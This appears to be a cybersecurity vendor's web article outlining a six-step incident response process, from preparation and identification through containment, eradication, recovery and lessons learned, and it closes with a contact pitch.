Incident response is a process that allows organizations to identify, prioritize, contain and eradicate cyberattacks. The goal of incident response is to ensure that organizations are aware of significant security incidents, and act quickly to stop the attacker, minimize damage caused, and prevent follow on attacks or similar incidents in the future. The aim is also to prevent follow on attacks or related incidents from taking place in the future.

A successful incident response process identifies attacks and deals with them as effectively and as early as possible. The objective of incident response is to bring the following to a minimum:

• Number of systems and users affected by a breach
• Damage inflicted to the organization
• Dwell time of attackers in the corporate network
• Time required to restore normal operations
• Cost of mitigation and clean-up efforts
• Liability and damage caused to third parties such as customers

Incident Response Steps

Step 1: Preparation

The goal of the preparation stage is to ensure that the organization can comprehensively respond to an incident at a moment’s notice.

Below are some items that should be prepared in advance:

Policy : define principle, rules and practices to guide security processes. Ensure the policy is highly visible both to employees and users.
Response Plan/Strategy : create a plan for incident handling, with prioritization of incidents based on organizational impact
Communication : create a communication plan that states which CSIRT members should be contacted during an incident, for what reasons and when they can be contacted.
Documentation : Documentation should answer the questions: Who, What, When, Where, Why, and How?. Any information you collect about the incident can also be used for lessons learned and to improve your incident response process.
Team : build a CSIRT team with all relevant skills, not just security. Include individuals with expertise in security but also IT operations, legal, human resources, and public relations—all of whom can be instrumental in dealing with and mitigating an attack.
Access control : make sure that CSIRT staff have the appropriate permissions to do their job. It is a good idea to have, as part of the incident response plan, network administrators add permissions to CSIRT member accounts, and then remove them when the incident is over.
Training : ensure initial and ongoing training for all CSIRT members on incident response processes, technical skills and relevant cyberattack patterns and techniques. Carry out drills at regular intervals to insure that everyone in the CSIRT knows what they need to do and is able to perform their duties during a real incident.
Tools : evaluate, select and deploy software and hardware that can help respond to an incident more effectively.

Step 2: Identification

This step deals with the detection and determination of whether a deviation from normal operations within an organization is an incident, and its scope assuming that the deviation is indeed an incident. This particular step requires one to gather events from various sources such as log files, error messages, and other resources, such intrusion detection systems and firewalls, that may produce evidence as to determine whether an event is an incident.

Identification step includes the following elements:

• Setting up monitoring for all sensitive IT systems and infrastructure.
• Analyzing events from multiple sources including log files, error messages, and alerts from security tools.
• Identifying an incident by correlating data from multiple sources, and reporting it as soon as possible.
• Notifying CSIRT members and establishing communication with a designated command center.
• Documenting everything that incident responders are doing as part of the attack—answering the Who, What, Where, Why, and How questions.
• Threat prevention and detection capabilities across all main attack vectors.

Step 3: Containment

The primary purpose of this phase is to limit the damage and prevent any further damage from happening. The goal is to limit damage from the current security incident and prevent any further damage. Several steps are necessary to completely mitigate the incident, while also preventing destruction of evidence that may be needed for prosecution.

Containment step includes the following:

Short-term containment —limiting the damage as soon as possible, usually by isolating network segments, taking down hacked production server and routing to failover.

System backup—taking a forensic image of the affected system(s), and only then wipe and reimage the systems. This will preserve evidence from the attack that can be used in court, and also for further investigation of the incident and lessons learned.

Long-term containment—applying temporarily fixes to make it possible to bring production systems back up. The primary focus is removing accounts or backdoors left by attackers on the systems, and addressing the root cause—for example, fixing a broken authentication mechanism or patching a vulnerability that led to the attack.

Step 4: Eradication

This phase includes the actual removal and restoration of affected systems. Eradication is intended to actually remove malware or other artifacts introduced by the attacks, and fully restore all affected systems.

The Eradication process involves:

Reimaging : complete wipe and re-image of affected system hard drives to ensure any malicious content is removed.

Preventing the root cause : understanding what caused the incident preventing future compromise, for example by patching a vulnerability exploited by the attacker.

Applying basic security best practices : for example, upgrading old software versions and disabling unused services.

Scan for malware : use anti-malware software, or Next-Generation Antivirus (NGAV) if available, to scan affected systems and ensure all malicious content is removed.

Step 5: Recovery

The purpose of this phase is to bring affected systems back into the production environment carefully, as to insure that it will not lead another incident. It is essential to test, monitor, and validate the systems that are being put back into production to verify that they are not being reinfected by malware or compromised by some other means.

Some of the important decisions to make during this phase are:

• Time and date to restore operations – it is vital to have the system operators/owners make the final decision based upon the advice of the CIRT.
• How to test and verify that the compromised systems are clean and fully functional.
• The duration of monitoring to observe for abnormal behaviors.
• The tools to test, monitor, and validate system behavior.

Step 6: Lessons Learned

The purpose of this phase is to complete any documentation that was not done during the incident, as well as any additional documentation that may be beneficial in future incidents. The document should also be written in a form of a report to answer the: Who, What, Where, Why, and How questions that may come up during the lessons learned meeting. The overall goal is to learn from the incidents that occurred within an organization to improve the team’s performance and provide reference materials in the event of a similar incident. No later than two weeks from the end of the incident, the CSIRT should compile all relevant information about the incident and extract lessons that can help with future incident response activity.

The lessons learned process includes:

Completing documentation : it is never possible to document all aspects of an incident while it is going on, and achieving comprehensive documentation is very important to identify lessons for next time.

Publishing an incident report : the report should provide play-by-play review of the entire incident, and answer the Who, What, Where, Why, and How questions.

General format for the incident report:

• When was the problem first detected and by whom
• The scope of the incident
• How it was contained and eradicated
• Worked performed during recovery
• Areas where the CIRT teams were effective
• Areas that need improvement

Identify ways to improve CSIRT performance : extract items from the incident report that were not handled correctly and can be improved for next time.

Establish a benchmark for comparison : derive metrics from the incident report that you can use to guide you in future incidents.

Lessons learned meeting : conduct a meeting with the CSIRT team and other stakeholders to discuss the incident and cement lessons learned that can be implemented immediately.

Contact Us

To learn how Cybersecurity incident response plan document can add value to protect your business systems against cyber-attacks and achieve compliance, speak with us today.